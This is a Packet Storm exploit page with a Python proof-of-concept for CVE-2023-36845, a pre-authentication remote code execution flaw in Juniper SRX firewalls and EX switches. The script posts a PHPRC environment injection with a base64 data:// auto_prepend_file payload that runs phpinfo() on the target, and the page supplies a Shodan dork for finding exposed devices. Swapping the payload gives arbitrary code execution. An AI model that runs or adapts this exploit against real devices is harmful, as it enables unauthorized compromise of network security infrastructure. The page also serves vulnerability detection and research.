what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Juniper SRX Firewall / EX Switch Remote Code Execution

Juniper SRX Firewall / EX Switch Remote Code Execution
Posted Feb 2, 2024
Authored by whiteOwl | Site whiteowl-pub.github.io

This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. It executes the phpinfo() function on the login page of the target device, allowing to inspect the PHP configuration. This script also has the option to save the phpinfo() output to a file for further analysis.

tags | exploit, php, proof of concept
advisories | CVE-2023-36845
SHA-256 | 56c0a0ad9dba5be91bcf88dbed7e2234e764bf5d6166e8250dfe5f1920543e02

Juniper SRX Firewall / EX Switch Remote Code Execution

Change Mirror Download
# ***************************************************************************************************
# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)
# Description:
#
# This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.
# It executes the phpinfo() function on the login page of the target device,
# allowing to inspect the PHP configuration. also this script has the option to save the phpinfo()
# output to a file for further analysis.
#
# Shodan Dork: http.favicon.hash:2141724739
# Date: 2023/10/01
# Exploit Author: whiteOwl (whiteowl.pub@gmail.com)
# Vendor Homepage: https://whiteowl-pub.github.io
# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,
# 21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22.
# 4R2-S1/R3,23.2R1-S1/R2
# Tested on: JUNOS SM804122pri 15.1X49-D170.4
# CVE : cve-2023-36845
# ***************************************************************************************************

import argparse
import requests

banner = """
*************************************************************
* CVE-2023-36845 Vulnerability Detector & Proof of concept *
* This script checks for the CVE-2023-36845 vulnerability *
* and run phpinfo() on vulnerable devices. *
* If you suspect a vulnerable system, please take action *
* immediately to secure it. *
* *
* Author: whiteowl *
*************************************************************
"""

def send_request(url, output_file=None, verbose=False):
target_url = f"{url}/?PHPRC=/dev/fd/0"
data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

headers = {
'User-Agent': 'Mozilla/5.0',
}

try:
response = requests.post(target_url, headers=headers, data=data, stream=True)
if response.status_code == 200:
print("The Target Device is Vulnerable to: CVE-2023-36845")
else:
print("Not Vulnerable: Status Code", response.status_code)

if output_file:
with open(output_file, 'w', encoding='utf-8') as file:
file.write(response.text)

if verbose:
print(f"HTTP Status Code: {response.status_code}")
print("Response Headers:")
for header, value in response.headers.items():
print(f"{header}: {value}")
print("Response Content:")
print(response.text)
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")

def main():
print(banner)
parser = argparse.ArgumentParser(description="Custom curl-like script")
parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request")
parser.add_argument("-o", "--output", help="Output file to save the HTML content")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")

args = parser.parse_args()
send_request(args.url, args.output, args.verbose)

if __name__ == "__main__":
main()


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close